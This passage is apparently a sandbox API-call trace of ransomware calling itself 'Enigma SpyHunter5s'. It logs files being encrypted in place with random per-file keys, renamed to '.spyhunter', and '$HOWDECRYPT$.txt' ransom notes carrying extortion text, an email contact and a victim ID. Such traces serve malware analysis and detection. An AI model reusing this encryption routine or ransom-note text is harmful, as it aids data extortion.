lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.647] GetProcessHeap () returned 0x2c0000 [0143.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030f60 | out: hHeap=0x2c0000) returned 1 [0143.647] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eeb8 | out: pbBuffer=0x270eeb8) returned 1 [0143.647] GetProcessHeap () returned 0x2c0000 [0143.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.647] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eeb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eeb0*=0x30) returned 1 [0143.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0143.687] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 105 [0143.688] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0143.688] GetProcessHeap () returned 0x2c0000 [0143.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.688] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ee74*=0x228, lpOverlapped=0x0) returned 1 [0143.688] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffdd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.688] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x228, lpNumberOfBytesWritten=0x270ee74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ee74*=0x228, lpOverlapped=0x0) returned 1 [0143.689] GetProcessHeap () returned 0x2c0000 [0143.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.689] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.689] WriteFile (in: hFile=0x120, lpBuffer=0x270eeb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee74, lpOverlapped=0x0 | out: lpBuffer=0x270eeb4*, lpNumberOfBytesWritten=0x270ee74*=0x4, lpOverlapped=0x0) returned 1 [0143.689] WriteFile (in: hFile=0x120, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee74, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee74*=0x30, lpOverlapped=0x0) returned 1 [0143.952] CloseHandle (hObject=0x120) returned 1 [0143.952] GetProcessHeap () returned 0x2c0000 [0143.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.952] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.spyhunter") returned 115 [0143.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.spyhunter" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.spyhunter")) returned 1 [0143.953] GetProcessHeap () returned 0x2c0000 [0143.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.953] GetProcessHeap () returned 0x2c0000 [0143.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.954] GetProcessHeap () returned 0x2c0000 [0143.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffabc0 | out: hHeap=0x2c0000) returned 1 [0143.954] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eeb8 | out: pbBuffer=0x270eeb8) returned 1 [0143.954] GetProcessHeap () returned 0x2c0000 [0143.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.954] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eeb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eeb0*=0x30) returned 1 [0143.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0143.968] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0143.968] StrStrW (lpFirst="Roses.jpg", lpSrch=".txt") returned 0x0 [0143.968] GetProcessHeap () returned 0x2c0000 [0143.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0143.968] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ee74*=0x780, lpOverlapped=0x0) returned 1 [0144.069] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffff880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.069] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x270ee74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ee74*=0x780, lpOverlapped=0x0) returned 1 [0144.069] GetProcessHeap () returned 0x2c0000 [0144.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.069] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.069] WriteFile (in: hFile=0x120, lpBuffer=0x270eeb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee74, lpOverlapped=0x0 | out: lpBuffer=0x270eeb4*, lpNumberOfBytesWritten=0x270ee74*=0x4, lpOverlapped=0x0) returned 1 [0144.069] WriteFile (in: hFile=0x120, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee74, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee74*=0x30, lpOverlapped=0x0) returned 1 [0144.069] CloseHandle (hObject=0x120) returned 1 [0144.119] GetProcessHeap () returned 0x2c0000 [0144.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0144.119] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.spyhunter") returned 88 [0144.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg.spyhunter")) returned 1 [0144.300] GetProcessHeap () returned 0x2c0000 [0144.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0144.300] GetProcessHeap () returned 0x2c0000 [0144.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0144.300] GetProcessHeap () returned 0x2c0000 [0144.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f323f0 | out: hHeap=0x2c0000) returned 1 [0144.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0144.301] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0144.301] WriteFile (in: hFile=0x178, lpBuffer=0x270ede7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef10, lpOverlapped=0x0 | out: lpBuffer=0x270ede7*, lpNumberOfBytesWritten=0x270ef10*=0x127, lpOverlapped=0x0) returned 1 [0144.301] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0144.301] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef10, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef10*=0x2ac, lpOverlapped=0x0) returned 1 [0144.301] CloseHandle (hObject=0x178) returned 1 [0144.302] GetProcessHeap () returned 0x2c0000 [0144.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f655c8 | out: hHeap=0x2c0000) returned 1 [0144.302] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eeb0 | out: pbBuffer=0x270eeb0) returned 1 [0144.302] GetProcessHeap () returned 0x2c0000 [0144.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0144.302] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eea8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eea8*=0x30) returned 1 [0144.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0144.302] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 75 [0144.302] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0144.302] GetProcessHeap () returned 0x2c0000 [0144.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0144.303] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ee6c*=0x0, lpOverlapped=0x0) returned 1 [0144.303] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.303] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x270ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ee6c*=0x0, lpOverlapped=0x0) returned 1 [0144.303] GetProcessHeap () returned 0x2c0000 [0144.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0144.303] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.303] WriteFile (in: hFile=0x178, lpBuffer=0x270eeac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee6c, lpOverlapped=0x0 | out: lpBuffer=0x270eeac*, lpNumberOfBytesWritten=0x270ee6c*=0x4, lpOverlapped=0x0) returned 1 [0144.304] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee6c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee6c*=0x30, lpOverlapped=0x0) returned 1 [0144.304] CloseHandle (hObject=0x178) returned 1 [0144.304] GetProcessHeap () returned 0x2c0000 [0144.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0144.304] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].spyhunter") returned 85 [0144.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1].spyhunter")) returned 1 [0144.304] GetProcessHeap () returned 0x2c0000 [0144.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0144.304] GetProcessHeap () returned 0x2c0000 [0144.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0144.305] GetProcessHeap () returned 0x2c0000 [0144.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7748 | out: hHeap=0x2c0000) returned 1 [0144.305] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eea8 | out: pbBuffer=0x270eea8) returned 1 [0144.305] GetProcessHeap () returned 0x2c0000 [0144.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0144.305] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eea0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eea0*=0x30) returned 1 [0144.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0144.305] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 77 [0144.305] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0144.305] GetProcessHeap () returned 0x2c0000 [0144.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0144.305] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee64, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ee64*=0x43, lpOverlapped=0x0) returned 1 [0144.306] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.306] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x270ee64, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ee64*=0x43, lpOverlapped=0x0) returned 1 [0144.306] GetProcessHeap () returned 0x2c0000 [0144.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0144.306] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.306] WriteFile (in: hFile=0x178, lpBuffer=0x270eea4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee64, lpOverlapped=0x0 | out: lpBuffer=0x270eea4*, lpNumberOfBytesWritten=0x270ee64*=0x4, lpOverlapped=0x0) returned 1 [0144.307] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee64, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee64*=0x30, lpOverlapped=0x0) returned 1 [0144.307] CloseHandle (hObject=0x178) returned 1 [0144.307] GetProcessHeap () returned 0x2c0000 [0144.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0144.307] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.spyhunter") returned 87 [0144.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.spyhunter")) returned 1 [0144.595] GetProcessHeap () returned 0x2c0000 [0144.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0144.595] GetProcessHeap () returned 0x2c0000 [0144.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0144.595] GetProcessHeap () returned 0x2c0000 [0144.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31d98 | out: hHeap=0x2c0000) returned 1 [0144.595] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eea8 | out: pbBuffer=0x270eea8) returned 1 [0144.595] GetProcessHeap () returned 0x2c0000 [0144.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0144.596] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eea0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eea0*=0x30) returned 1 [0144.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.596] GetProcessHeap () returned 0x2c0000 [0144.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0144.596] GetProcessHeap () returned 0x2c0000 [0144.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7568 | out: hHeap=0x2c0000) returned 1 [0144.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0144.596] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0144.596] WriteFile (in: hFile=0x178, lpBuffer=0x270edd7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef00, lpOverlapped=0x0 | out: lpBuffer=0x270edd7*, lpNumberOfBytesWritten=0x270ef00*=0x127, lpOverlapped=0x0) returned 1 [0144.598] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0144.598] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef00*=0x2ac, lpOverlapped=0x0) returned 1 [0144.598] CloseHandle (hObject=0x178) returned 1 [0144.598] GetProcessHeap () returned 0x2c0000 [0144.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f654d8 | out: hHeap=0x2c0000) returned 1 [0144.598] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eea0 | out: pbBuffer=0x270eea0) returned 1 [0144.598] GetProcessHeap () returned 0x2c0000 [0144.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0144.598] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee98*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee98*=0x30) returned 1 [0144.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0144.601] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 75 [0144.601] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0144.601] GetProcessHeap () returned 0x2c0000 [0144.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0144.601] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee5c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ee5c*=0x0, lpOverlapped=0x0) returned 1 [0144.601] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.601] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x270ee5c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ee5c*=0x0, lpOverlapped=0x0) returned 1 [0144.601] GetProcessHeap () returned 0x2c0000 [0144.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0144.601] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.601] WriteFile (in: hFile=0x178, lpBuffer=0x270ee9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee5c, lpOverlapped=0x0 | out: lpBuffer=0x270ee9c*, lpNumberOfBytesWritten=0x270ee5c*=0x4, lpOverlapped=0x0) returned 1 [0144.602] 